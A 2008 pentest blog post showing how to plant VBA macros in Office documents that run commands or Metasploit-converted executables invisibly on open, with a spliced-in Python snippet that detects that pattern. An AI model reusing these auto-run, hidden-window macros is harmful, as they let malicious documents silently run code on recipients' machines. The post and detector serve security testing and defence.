Sunday, November 16, 2008

On VBA in Excel and Word Documents...

There have been a few posts around the interwebs recently on how to use VBA to boobytrap Excel or Word documents with executables that will run on startup. I've been playing with it a bit and thought I'd write a series of posts on my findings to store this info in one place, in case anyone else finds this stuff useful in pentests.

First, a quick note on converting executables to store in VBA. Based on my testing, the default Visual Basic Editor (VBE) that comes with MS Office 2003 (haven't tested 2007 yet) has a relatively low memory limit on how much you can store inside the script sections. This correlates to a max executable filesize of around 32k on my system. With anything larger than that, you won't be able to paste in the output from metasploit's exe2vba; you will receive the error message "Not Enough Memory".

I'm sure you could convert this script to store the hex strings inside a hidden, locked worksheet and reference it from the code sections. I don't know how many of you will run into this, as many of the metasploit payloads are only around 10k.

Back to VBA, we'll start with a couple of simple functions that will allow you to run invisible commands or programs on the system:

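' Run a command line through the command interpreter (%COMSPEC% /c).
' visibility: window style passed to WshShell.Run (0 = hidden, 1 = normal window)
' wait_on_execute: True blocks the macro until the process exits
Sub Run_Cmd(command, visibility, wait_on_execute)
    Dim WshShell As Object
    Set WshShell = CreateObject("WScript.Shell")
    WshShell.Run "%COMSPEC% /c " & command, visibility, wait_on_execute
End Sub

' Start a program directly, with optional arguments; same visibility and wait flags.
Sub Run_Program(program, arguments, visibility, wait_on_execute)
    Dim WshShell As Object
    Set WshShell = CreateObject("WScript.Shell")
    WshShell.Run program & " " & arguments & " ", visibility, wait_on_execute
End Sub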


These would be called from within the "ThisWorkbook" tab in VBE with a function like:

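' Readable names for the window style and wait arguments
Const VISIBLE = 1, INVISIBLE = 0
Const WAIT = True, NOWAIT = False

' Workbook_Open fires automatically when the workbook is opened with macros enabled
Sub Workbook_Open()
    Run_Cmd "ping 127.0.0.1", VISIBLE, WAIT
    Run_Program "notepad.exe", "", VISIBLE, NOWAIT
End Sub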


INVISIBLE / VISIBLE does just what you would think: toggles the visibility of the program or command as you wish. WAIT / NOWAIT also functions as you would expect; if set to WAIT, the VBA execution will halt until the process finishes. NOWAIT continues execution as soon as the program/command begins.
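
From the reviewing side, the same pattern is easy to spot in extracted macro source. The Python sketch below is an added example, not code from the original post: it flags auto-run handlers, WScript.Shell creation, and calls whose window style resolves to 0, following one level of wrapper subs such as Run_Cmd. The sample macro, the function names and the list of handler names are assumptions made here, and it only handles untyped parameter lists and statement-style calls like those shown above.

```python
import re

AUTO_EXEC = {"workbook_open", "auto_open", "document_open", "autoopen"}
SUB_RE = re.compile(r"^\s*(?:Public\s+|Private\s+)?Sub\s+(\w+)\s*\((.*?)\)", re.I)
RUN_RE = re.compile(r"\.Run\s+(.+)$", re.I)
SHELL_RE = re.compile(r'CreateObject\(\s*"WScript\.Shell"\s*\)', re.I)

# Constructed sample, modelled on the macro in the post (already extracted as text).
SAMPLE = '''Const VISIBLE = 1, INVISIBLE = 0
Sub Run_Cmd(command, visibility, wait_on_execute)
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "%COMSPEC% /c " & command, visibility, wait_on_execute
End Sub
Sub Workbook_Open()
Run_Cmd "ping 127.0.0.1", INVISIBLE, True
End Sub'''

def split_args(text):
    """Split a VBA argument list on commas that sit outside string literals."""
    return [a.strip() for a in re.split(r',(?=(?:[^"]*"[^"]*")*[^"]*$)', text)]

def triage_macro(source):
    """Return (line, kind, detail) findings for auto-run shell execution."""
    consts, wrappers, findings, name, params = {}, {}, [], None, []
    lines = [l.strip() for l in source.splitlines()]
    # Pass 1: constants, plus subs that forward a parameter as .Run's window style.
    for s in lines:
        if s.lower().startswith("const "):
            consts.update((k.lower(), v) for k, v in re.findall(r"(\w+)\s*=\s*(\w+)", s[6:]))
        sub, run = SUB_RE.match(s), RUN_RE.search(s)
        if sub:
            name = sub.group(1).lower()
            params = [p.strip().lower() for p in sub.group(2).split(",") if p.strip()]
        if run and len(a := split_args(run.group(1))) > 1 and a[1].lower() in params:
            wrappers[name] = params.index(a[1].lower())
    # Pass 2: flag auto-exec handlers, shell objects and window style 0 (hidden).
    for n, s in enumerate(lines, 1):
        sub, run, (head, _, rest) = SUB_RE.match(s), RUN_RE.search(s), s.partition(" ")
        if sub and sub.group(1).lower() in AUTO_EXEC:
            findings.append((n, "auto-exec", sub.group(1)))
        if SHELL_RE.search(s):
            findings.append((n, "shell-object", "WScript.Shell"))
        if run:   # direct .Run call: the window style is the second argument
            args, idx = split_args(run.group(1)), 1
        else:     # call to a wrapper sub: the style is the parameter it forwards
            args, idx = split_args(rest), wrappers.get(head.lower())
        if idx is not None and idx < len(args) and consts.get(args[idx].lower(), args[idx]) == "0":
            findings.append((n, "hidden-window", s))
    return findings
```

A document that combines all three findings (auto-run entry point, shell object, hidden window) deserves a closer look before anyone enables its macros.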

1 comment:

lyndor said...

Great! it helped me a lot!!
Thanks :-)

Shai